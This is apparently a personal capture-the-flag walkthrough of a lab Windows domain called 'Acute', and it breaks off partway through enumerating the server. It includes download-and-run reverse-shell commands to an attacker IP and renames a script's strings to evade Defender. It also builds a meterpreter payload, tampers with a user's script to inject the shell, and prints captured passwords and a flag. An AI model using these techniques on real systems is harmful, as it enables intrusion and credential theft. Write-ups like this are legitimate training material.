Acute

Recon

nmap_scan.log

Open 10.129.76.192:443
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.76.192

PORT    STATE SERVICE  REASON  VERSION
443/tcp open  ssl/http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Issuer: commonName=acute-ATSSERVER-CA/domainComponent=acute
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-01-06T06:34:58
| Not valid after:  2030-01-04T06:34:58
| MD5:   cf3a:d387:8ede:75cf:89c1:8806:0b6b:c823
| SHA-1: f954:d677:0cf3:54df:3fa2:ed4f:78c3:1902:c120:a368
| -----BEGIN CERTIFICATE-----
| MIIFiDCCBHCgAwIBAgITMgAAAAPIc8FINNJA7QAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBLMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFTATBgoJkiaJk/IsZAEZFgVhY3V0
| ZTEbMBkGA1UEAxMSYWN1dGUtQVRTU0VSVkVSLUNBMB4XDTIyMDEwNjA2MzQ1OFoX
| DTMwMDEwNDA2MzQ1OFowIDEeMBwGA1UEAxMVYXRzc2VydmVyLmFjdXRlLmxvY2Fs
| MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5I83XS+EgKDI6LWJAgkG
| r+UEcm9Fe8lpgi76x9bHi0iuwy6nzIhpIS2wTgUrVyLs0615/jX8/QoG61TvUdRv
| JrK0Pz8mGqr3AaBP/TZ66Ikua2+5e2Ep3AKMatmFKmh2LJOTJHgcCZ0mmbjBYsKV
| nstm4rCmsxnBLSJvzioLvjTKoW7w54L8ytI/3OkU96JWSVEeWVPLarRa5bSJJw23
| YkORTbXGpMS5WS/Ri9ULlyQ05yOduCUVVkf51uUMl1g9qC54BWJK9+Tudrw25I8j
| i/cKcCfrpIg7goJszwskocEFcWvd4M6X5MtLxM0Ym/zDdWHSbO73k6RQznrXSkyI
| +QIDAQABo4ICjjCCAoowPQYJKwYBBAGCNxUHBDAwLgYmKwYBBAGCNxUIgdLLYoO6
| uH+G7Ycfh6ubRYPxxA8whMqJV4Pi6S4CAWQCAQQwEwYDVR0lBAwwCgYIKwYBBQUH
| AwEwDgYDVR0PAQH/BAQDAgWgMBsGCSsGAQQBgjcVCgQOMAwwCgYIKwYBBQUHAwEw
| HQYDVR0OBBYEFFO05mfmIOSLXSu0oWbxyzgNTwrRMCsGA1UdEQQkMCKCFWF0c3Nl
| cnZlci5hY3V0ZS5sb2NhbIIJYXRzc2VydmVyMB8GA1UdIwQYMBaAFM2FE9nl3pUL
| kFBnuMVdNlldV9FJMIHSBgNVHR8EgcowgccwgcSggcGggb6GgbtsZGFwOi8vL0NO
| PWFjdXRlLUFUU1NFUlZFUi1DQSxDTj1BVFNTRVJWRVIsQ049Q0RQLENOPVB1Ymxp
| YyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24s
| REM9YWN1dGUsREM9bG9jYWw/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNl
| P29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHEBggrBgEFBQcBAQSB
| tzCBtDCBsQYIKwYBBQUHMAKGgaRsZGFwOi8vL0NOPWFjdXRlLUFUU1NFUlZFUi1D
| QSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMs
| Q049Q29uZmlndXJhdGlvbixEQz1hY3V0ZSxEQz1sb2NhbD9jQUNlcnRpZmljYXRl
| P2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG
| 9w0BAQsFAAOCAQEAPCYQ8PZWupiFDR5Nr9ai5pyBieTvFUu8iFCs/E9e9dkU7+eN
| 24la6d6hAALMyXd64nf1sQhkWCkDc/E8uJU4/jsA+vqQ+jS+Woad7tfEI+S/+UOq
| DPoOGOzj9EVnJVsF1Rfed4Kf83SWhSrYIYJCcwQuOhVtPyXL2UEj7SReP3WmBT52
| NvWZSxcOh6aOd2c/SFnLPLp1QOk1euVzAeUNqCNx2c+hEIb9Wz7CKtbFmDNgBlIX
| oDL8qorZFspSU6xn3DpSHqTx9sODQGPBMEDzB8gzQA0VdBHyWlKko1M/uc50taIN
| odyAYPv283lqci8KHFY/kj3aGcx6a/QbJEpiCA==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-12-20T09:31:59+00:00; 0s from scanner time.
| tls-alpn: 
|_  http/1.1
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s

HTTPs (443)

When we visit domain we get the pages. On /about.html there's new header which allows us to download Starter Forms.

└─$ curl -kLOs https://atsserver.acute.local/New_Starter_CheckList_v7.docx

└─$ exiftool New_Starter_CheckList_v7.docx
ExifTool Version Number         : 12.76
File Name                       : New_Starter_CheckList_v7.docx
Directory                       : .
File Size                       : 35 kB
File Modification Date/Time     : 2024:12:20 04:39:27-05:00
File Access Date/Time           : 2024:12:20 04:39:34-05:00
File Inode Change Date/Time     : 2024:12:20 04:39:27-05:00
File Permissions                : -rw-rw-r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x079b7eb2
Zip Compressed Size             : 428
Zip Uncompressed Size           : 2527
Zip File Name                   : [Content_Types].xml
Creator                         : FCastle
Description                     : Created on Acute-PC01
Last Modified By                : Daniel
Revision Number                 : 8
Last Printed                    : 2021:01:04 15:54:00Z
Create Date                     : 2021:12:08 14:21:00Z
Modify Date                     : 2021:12:22 00:39:00Z
Template                        : Normal.dotm
Total Edit Time                 : 2.6 hours
Pages                           : 3
Words                           : 886
Characters                      : 5055
Application                     : Microsoft Office Word
Doc Security                    : None
Lines                           : 42
Paragraphs                      : 11
Scale Crop                      : No
Heading Pairs                   : Title, 1
Titles Of Parts                 :
Company                         : University of Marvel
Links Up To Date                : No
Characters With Spaces          : 5930
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 16.0000

└─$ open New_Starter_CheckList_v7.docx

Default Password: Password1!

There's 1 more link: https://atsserver.acute.local/Acute_Staff_Access

FCastle doesn't work, but we have format used for usernames.

In the /about.html we have usernames:

...these members include Aileen Wallace, Charlotte Hall, Evan Davies, Ieuan Monks, Joshua Morgan, and Lois Hopkins.

# Usernames
AWallace
CHall
EDavies
IMonks
JMorgan
LHopkins

# Passwords
Password1!

Staff Access (EDavies)

Creds: EDavies:Password1!:Acute-PC01

PS C:\Users\edavies\Documents> 
User Name     SID                                           
============= ==============================================
acute\edavies S-1-5-21-1786406921-1914792807-2072761762-1106
 
Group Name                                 Type             SID          Attributes                                    
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                                                
 
Privilege Name                Description                    State  
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Kerberos support for Dynamic Access Control on this device has been disabled.

There's no webserver on this computer, but there's Utils

PS C:\> ls
    Directory: C:\
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         12/7/2019   9:14 AM                PerfLogs                                                             
d-r---         12/6/2021  11:06 AM                Program Files                                                        
d-r---         12/7/2021  12:43 PM                Program Files (x86)                                                  
d-r---        12/21/2021  10:50 PM                Users                                                                
d-----         1/31/2022  12:29 AM                Utils                                                                
d-----        12/16/2021   1:23 AM                Windows                                                              
PS C:\>  cd utils
PS C:\utils> ls -force
    Directory: C:\utils
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-h--        12/21/2021   6:41 PM            148 desktop.ini                                                          
PS C:\utils> cat .\desktop.ini
[.ShellClassInfo]
InfoTip=Directory for Testing Files without Defender

It seems like Defender is disabled for this directory.

Reverse Shell

Let's upgrade the shell.

ConPtyShell gets detected by defender and doesn't give callback.

└─$ stty raw -echo; (stty size; cat) | nc -lvnp 4444
---
PS C:\utils> IEX(IWR http://10.10.14.123/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.123 4444

Since Defender is signature based we can replace certain words to make the powershell script legitimate, by doing so Defender doesn't get angry and we get a callback.

└─$ sed '/<#/,/#>/d; s/ConPtyShell/Letmein/g' Invoke-ConPtyShell.ps1 > Invoke-Letmein.ps1
---
PS C:\utils> IEX(IWR http://10.10.14.123/Invoke-Letmein.ps1 -UseBasicParsing); Invoke-Letmein 10.10.14.123 4444

Fix the terminal size using your stty size: docs

$width=210
$height=45
$Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height)
$Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height)

Enumerate with winpeas

PS C:\> curl.exe 10.10.14.123/wp.exe -o /Utils/wp.exe
PS C:\Utils> .\wp.exe | tee -filepath wp.log
╔══════════╣ AV Information
  [X] Exception: Access denied
    No AV was detected!!
    whitelistpaths:     C:\Utils
    C:\Windows\System32
╔══════════╣ UAC Status
╚ If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy:
    FilterAdministratorToken:
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
      [-] Only the RID-500 local admin account can be used for lateral movement.

╔══════════╣ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.19041.1
    PowerShell Core Version:
    Transcription Settings:
    Module Logging Settings:
    Scriptblock Logging Settings:
    PS history file: C:\Users\edavies\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 6B
╔══════════╣ Checking KrbRelayUp
╚  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
  The system is inside a domain (ACUTE) so it could be vulnerable.
╚ You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
╔══════════╣ Checking If Inside Container
╚ If the binary cexecsvc.exe or associated service exists, you are inside Docker
You are NOT inside a container
╔══════════╣ RDP Sessions
    Not Found

╔══════════╣ Ever logged users
  [X] Exception: Access denied
    Not Found

╔══════════╣ Home folders found
    C:\Users\administrator.ACUTE
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\edavies : edavies [AllAccess]
    C:\Users\jmorgan
    C:\Users\Natasha
    C:\Users\Public
╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  Acute
    DefaultUserName               :  edavies
    DefaultPassword               :  Password1!
╔══════════╣ Checking Credential manager
╚  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-manager-windows-vault
    [!] Warning: if password contains non-printable characters, it will be printed as unicode base64 encoded string
    [!] Unable to enumerate credentials automatically, error: 'Win32Exception: System.ComponentModel.Win32Exception (0x80004005): A specified logon session does not exist. It may already have been terminated'
Please run:
cmdkey /list
╔══════════╣ Looking for possible password files in users homes
╚  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
    C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml
    C:\Users\edavies\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\2.0.0.0\passwords.txt
╔══════════╣ Looking for Linux shells/distributions - wsl.exe, bash.exe
    C:\Windows\System32\wsl.exe

Get-Process shows 2 active sessions: 0 and 1. We are probably 0 since we have powershell, but 1 is some other user.

PS C:\Utils> Get-Process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    134       9     6316      11988       0.02    644   0 conhost
     98       7     1512       5468       1.66   1168   0 conhost
    342      14     1624       4808               492   0 csrss
    167      11     1536       4668               576   1 csrss
    354      17     3108      12112              3292   0 dasHost
    705      27    18136      40172               972   1 dwm
     37       6     1452       3744               796   0 fontdrvhost
      0       0       60          8                 0   0 Idle
    707      38    18264      63532               964   1 LogonUI
   1014      28     4868      15416               668   0 lsass
      0       0      172      15628              1816   0 Memory Compression
    210      12     1904        684               748   0 MicrosoftEdgeUpdate
    379      18    15828      29596              3532   0 MoUsoCoreWorker
    209      11     3952      10580              3736   0 NisSrv
    613      28   119680     131432       4.64   1276   0 powershell
      0      11     2584      17288                72   0 Registry
    318      11     3248       7612               660   0 services
    105       7     3508       6472              3356   0 SgrmBroker
     53       3     1060       1108               384   0 smss
    419      21    12176      17528               480   0 svchost
    393      14     3508      10968               564   0 svchost
    662      19    12472      17888               688   0 svchost
   1220      20     6880      16928               804   0 svchost
    700      38     8384      23340               860   0 svchost
    618      17     3620       9632               888   0 svchost
    208      13     1784       7524              1028   0 svchost
    572      28    53316      53500              1044   0 svchost
    831      54     8664      22980              1160   0 svchost
    410      31    12160      20176              1416   0 svchost
    427      24     3424      11568              1444   0 svchost
    278      14     3112       9584              1476   0 svchost
    126       8     1492       6292              1924   0 svchost
    362      12     2176       9068              1932   0 svchost
    205      11     1848       7992              2788   0 svchost
    364      18     4312      15676              2932   0 svchost
    350      21     3148      10092              3260   0 svchost
    137       9     4080      12256              3520   0 svchost
    211      12     2316       9892              3772   0 svchost
    240      14     7044      19716              3868   0 svchost
   1436       0      192        144                 4   0 System
    111       7     1352       6364              3616   0 uhssvc
    162      11     1352       6656               568   0 wininit
    216      11     2148       8456               636   1 winlogon
    716      35   116392     138604       2.77    500   0 wsmprovhost
    376      24    39248      48416       0.66   2732   0 wsmprovhost

PS C:\Users\edavies\Documents> qwinsta.exe
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE 
 console           edavies                   1  Active

└─$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=tun0 LPORT=4445 -o rev4445.exe
└─$ msfconsole -q -x 'use multi/handler; set LHOST tun0; set LPORT 4445; set payload windows/meterpreter/reverse_tcp; run'
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.123:4445
---
PS C:\Utils> curl.exe 10.10.14.123/rev4445.exe -Os
PS C:\Utils> .\rev4445.exe
---
[*] Sending stage (176198 bytes) to 10.129.76.192
[*] Meterpreter session 1 opened (10.10.14.123:4445 -> 10.129.76.192:49810) at 2024-12-20 05:41:40 -0500

meterpreter > getuid
Server username: ACUTE\edavies

meterpreter > ps

Process List
============

 PID   PPID  Name                           Arch  Session  User           Path
 ---   ----  ----                           ----  -------  ----           ----
 0     0     [System Process]
 4     0     System
 72    4     Registry
 408   4     smss.exe
 460   640   svchost.exe
 476   640   svchost.exe
 512   500   csrss.exe
 580   500   wininit.exe
 588   572   csrss.exe
 640   580   services.exe
 672   580   lsass.exe
 680   572   winlogon.exe
 736   640   svchost.exe
 800   580   fontdrvhost.exe
 808   640   svchost.exe
 816   680   fontdrvhost.exe
 872   640   svchost.exe
 900   640   svchost.exe
 976   640   svchost.exe
 980   680   dwm.exe
 1052  640   svchost.exe
 1060  640   svchost.exe
 1132  640   svchost.exe
 1420  640   svchost.exe
 1440  640   svchost.exe
 1476  640   svchost.exe
 1508  640   MsMpEng.exe
 1768  4     Memory Compression
 1896  640   svchost.exe
 1908  640   svchost.exe
 2104  4356  msedge.exe                     x64   1        ACUTE\edavies  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
 2128  4356  msedge.exe                     x64   1        ACUTE\edavies  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
 2476  640   svchost.exe
 2540  640   SecurityHealthService.exe
 2544  640   svchost.exe
 2616  476   CompatTelRunner.exe
 2656  6124  rev4445.exe                    x86   0        ACUTE\edavies  C:\Utils\rev4445.exe
 2888  640   svchost.exe
 2916  476   wermgr.exe
 3000  2616  conhost.exe
 3008  808   smartscreen.exe                x64   1        ACUTE\edavies  C:\Windows\System32\smartscreen.exe
 3012  640   svchost.exe
 3280  476   sihost.exe                     x64   1        ACUTE\edavies  C:\Windows\System32\sihost.exe
 3292  640   svchost.exe                    x64   1        ACUTE\edavies  C:\Windows\System32\svchost.exe
 3304  5280  conhost.exe                    x64   1        ACUTE\edavies  C:\Windows\System32\conhost.exe
 3380  476   MicrosoftEdgeUpdate.exe
 3400  476   taskhostw.exe                  x64   1        ACUTE\edavies  C:\Windows\System32\taskhostw.exe
 3616  476   OneDriveStandaloneUpdater.exe  x64   1        ACUTE\edavies  C:\Users\edavies\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
 3656  3644  explorer.exe                   x64   1        ACUTE\edavies  C:\Windows\explorer.exe
 3744  4356  msedge.exe                     x64   1        ACUTE\edavies  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
 3748  808   TiWorker.exe
 3808  640   svchost.exe                    x64   1        ACUTE\edavies  C:\Windows\System32\svchost.exe
 3824  640   NisSrv.exe
 4084  476   taskhostw.exe                  x64   1        ACUTE\edavies  C:\Windows\System32\taskhostw.exe
 4220  808   StartMenuExperienceHost.exe    x64   1        ACUTE\edavies  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
 4296  808   RuntimeBroker.exe              x64   1        ACUTE\edavies  C:\Windows\System32\RuntimeBroker.exe
 4308  640   svchost.exe
 4356  3656  msedge.exe                     x64   1        ACUTE\edavies  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
 4368  3656  OneDrive.exe                   x64   1        ACUTE\edavies  C:\Users\edavies\AppData\Local\Microsoft\OneDrive\OneDrive.exe
 4392  4356  msedge.exe                     x64   1        ACUTE\edavies  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
 4492  808   SearchApp.exe                  x64   1        ACUTE\edavies  C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
 4652  808   RuntimeBroker.exe              x64   1        ACUTE\edavies  C:\Windows\System32\RuntimeBroker.exe
 4692  808   WmiPrvSE.exe
 4716  6080  conhost.exe                    x64   1        ACUTE\edavies  C:\Windows\System32\conhost.exe
 4996  808   RuntimeBroker.exe              x64   1        ACUTE\edavies  C:\Windows\System32\RuntimeBroker.exe
 5144  2616  CompatTelRunner.exe
 5280  476   cmd.exe                        x64   1        ACUTE\edavies  C:\Windows\System32\cmd.exe
 5288  808   wsmprovhost.exe                x64   0        ACUTE\edavies  C:\Windows\System32\wsmprovhost.exe
 5360  808   WmiPrvSE.exe
 5376  640   TrustedInstaller.exe
 5680  640   SgrmBroker.exe
 5688  640   svchost.exe
 5752  640   uhssvc.exe
 5784  5280  Utilman.exe                    x64   1        ACUTE\edavies  C:\Windows\System32\Utilman.exe
 5820  808   MoUsoCoreWorker.exe
 5908  640   svchost.exe
 6080  3656  powershell.exe                 x64   1        ACUTE\edavies  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 6124  808   wsmprovhost.exe                x64   0        ACUTE\edavies  C:\Windows\System32\wsmprovhost.exe

meterpreter > migrate 3656
[*] Migrating from 2656 to 3656...
[*] Migration completed successfully.
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /home/woyag/Desktop/Rooms/Acute/SnTSkQdz.html
[*] Streaming...

Privilege Escalation (imonks)

Creds: imonks:W3_4R3_th3_f0rce.

meterpreter > shell
C:\Windows\system32>powershell
PS C:\Windows\system32> $username = "acute\imonks"
PS C:\Windows\system32> $passwd = ConvertTo-SecureString -AsPlainText -Force "W3_4R3_th3_f0rce."
PS C:\Windows\system32> $cred = New-Object System.Management.Automation.PSCredential($username, $passwd)$username = "acute\imonks"
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { whoami }
acute\imonks

PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { IEX(IWR http://10.10.14.123/Invoke-Letmein.ps1 -UseBasicParsing); Invoke-Letmein 10.10.14.123 4444; }
Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { id }

User.txt

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat ../Desktop/user.txt }
4635fd7a67cc1f63dbf88272c5bb81d4

Privilege Escalation (jmorgan)

I tried getting reverse shell in same manner as EDavies, but no command was working on ATTSERVER. List the available commands for powershell:

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { Get-Command }

CommandType     Name                                               Version    Source               PSComputerName
-----------     ----                                               -------    ------               --------------
Cmdlet          Get-Alias                                          3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Get-ChildItem                                      3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Get-Command                                        3.0.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Get-Content                                        3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Get-Location                                       3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Set-Content                                        3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Set-Location                                       3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Write-Output                                       3.1.0.0    Microsoft.PowerSh... ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls ../ -rec }
    Directory: C:\Users\imonks

Mode                 LastWriteTime         Length Name                               PSComputerName
----                 -------------         ------ ----                               --------------
d-r---        21/12/2021     22:29                Desktop                            ATSSERVER
d-r---        21/12/2021     16:01                Documents                          ATSSERVER
d-r---        15/09/2018     08:12                Downloads                          ATSSERVER
d-r---        15/09/2018     08:12                Favorites                          ATSSERVER
d-r---        15/09/2018     08:12                Links                              ATSSERVER
d-r---        15/09/2018     08:12                Music                              ATSSERVER
d-r---        15/09/2018     08:12                Pictures                           ATSSERVER
d-----        15/09/2018     08:12                Saved Games                        ATSSERVER
d-r---        15/09/2018     08:12                Videos                             ATSSERVER

    Directory: C:\Users\imonks\Desktop

Mode                 LastWriteTime         Length Name                               PSComputerName
----                 -------------         ------ ----                               --------------
-ar---        20/12/2024     16:51             34 user.txt                           ATSSERVER
-a----        11/01/2022     18:04            602 wm.ps1                             ATSSERVER

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat ../Desktop/wm.ps1 }
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds

We can't decode this string locally ConvertTo-SecureString : Key not valid for use in specified state.

We do have permissions to write to files, but can we execute?

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { C:\Users\imonks\Desktop\wm.ps1 }
PSComputerName       : ATSSERVER
RunspaceId           : a13b6e27-0822-4025-835e-d38c56eb77d4
ObjectId             : {1}\\ACUTE-PC01\root/Microsoft/Windows/Storage/Providers_v2\WSP_Volume.ObjectId="{8ccfebca-48c0-11ec-9ffe-806e6f6e6963}:VO:\\?\Volume{0eed1261-0000-0000-0000-100000000000}\""
PassThroughClass     :
PassThroughIds       :
PassThroughNamespace :
PassThroughServer    :
UniqueId             : \\?\Volume{0eed1261-0000-0000-0000-100000000000}\
AllocationUnitSize   : 4096
DedupMode            : 4
DriveLetter          :
DriveType            : 3
FileSystem           : NTFS
FileSystemLabel      : System Reserved
FileSystemType       : 14
HealthStatus         : 0
OperationalStatus    : {2}
Path                 : \\?\Volume{0eed1261-0000-0000-0000-100000000000}\
Size                 : 52424704
SizeRemaining        : 20611072
...

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ((cat C:\Users\imonks\Desktop\wm.ps1) -Replace "Get-Volume", "IEX(IWR http://10.10.14.123/Invoke-Letmein.ps1 -UseBasicParsing); Invoke-Letmein 10.10.14.123 4444;") | Set-Content C:\Users\imonks\Desktop\wm.ps1 }

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat C:\Users\imonks\Desktop\wm.ps1 }

PS C:\Utils> Start-Job -ScriptBlock { $username = "acute\imonks"; $passwd = ConvertTo-SecureString -AsPlainText -Force "W3_4R3_th3_f0rce."; $cred = New-Object System.Management.Automation.PSCredential($username, $passwd); Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { C:\Users\imonks\Desktop\wm.ps1 } }

PS C:\Windows\system32> whoami /all

User Name     SID
============= ==============================================
acute\jmorgan S-1-5-21-1786406921-1914792807-2072761762-1108

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ===============================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:\> hostname
Acute-PC01

We are admin user, but we are still on Acute-PC01 for some reason, even tho commands were issued on ATTSERVER 🤔

There's odd directory in /Program Files, but we the administrator can't read it (?). Unfortunately we can't run

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls '/Program Files' }
    Directory: C:\Program Files

Mode                 LastWriteTime         Length Name                               PSComputerName
----                 -------------         ------ ----                               --------------
d-----        21/12/2021     00:04                common files                       ATSSERVER
d-----        21/12/2021     00:11                Hyper-V                            ATSSERVER
d-----        15/09/2018     08:12                internet explorer                  ATSSERVER
d-----        01/02/2022     19:41                keepmeon                           ATSSERVER
d-----        21/12/2021     00:04                VMware                             ATSSERVER
d-----        20/12/2021     21:19                Windows Defender                   ATSSERVER
d-----        20/12/2021     21:12                Windows Defender Advanced Threat   ATSSERVER
d-----        21/12/2021     14:13                WindowsPowerShell                  ATSSERVER

